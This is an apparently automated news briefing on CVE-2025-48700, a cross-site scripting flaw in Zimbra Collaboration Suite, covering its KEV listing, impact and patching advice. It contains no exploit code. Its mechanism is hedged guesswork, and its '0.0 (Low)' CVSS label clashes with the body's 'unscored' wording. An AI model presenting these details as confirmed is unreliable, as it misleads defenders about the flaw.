Part of Lyceum Intelligence — deep-research In Focus reports → · Lyceum Corpus — ask the documents →

Full-text search across 381 articles. Typo-tolerant.

Lyceum News Desk ·

[KEV] CVE-2025-48700 -- CVSS 0.0 Vulnerability Briefing

[KEV] CVE-2025-48700 | CVSS 0.0 (Low) | Exploit: Operational

What Is It

CVE-2025-48700 is a stored or reflected cross-site scripting (XSS) vulnerability in Synacor Zimbra Collaboration Suite (ZCS), a widely deployed enterprise email and collaboration platform.

Technical Detail

The flaw allows an attacker to inject and execute arbitrary JavaScript within the context of an authenticated user's browser session. Exploitation likely involves delivering a crafted input through a mail message, calendar item, or another user-facing ZCS component that fails to properly sanitize or encode output before rendering it in the browser. Successful exploitation can result in session token theft, credential harvesting, unauthorized access to mailbox contents, or further lateral movement within the organization depending on the privileges of the targeted user.

Exploitation Status

CISA has confirmed active exploitation in the wild, adding this vulnerability to the Known Exploited Vulnerabilities catalog on April 20, 2026. The exploit maturity is rated Operational, meaning functional exploit code exists and is being used in real-world attacks, not merely demonstrated in a controlled research context. Organizations running unpatched ZCS instances should treat this as an immediate priority.

Who Is Targeting This

No specific threat actor attribution has been confirmed at this time. Zimbra vulnerabilities have historically attracted interest from espionage-motivated actors and financially motivated groups due to the sensitive nature of email data, but no named group has been formally attributed to exploitation of this specific CVE as of April 21, 2026.

What To Do

Apply the vendor-supplied patch for Zimbra Collaboration Suite immediately. Per CISA's Known Exploited Vulnerabilities catalog, federal agencies operating under BOD 22-01 are required to remediate this vulnerability by the deadline associated with the April 20, 2026 KEV listing. All organizations should treat this as a high-priority patch regardless of the currently unscored CVSS rating, as the KEV listing and operational exploit maturity represent a more accurate risk signal than the score alone. If patching cannot be completed immediately, consider restricting access to the ZCS web interface to trusted IP ranges, enforcing multi-factor authentication on all accounts, and monitoring web application logs for anomalous script injection patterns or unexpected session activity. Review ZCS release notes and the Synacor security advisory for specific version guidance and any available workarounds.

In Focus
All analysis →

Deep-research intelligence reports from Lyceum Intelligence — structured assessments with sourced claims and calibrated conclusions.

Browse Intelligence Reports →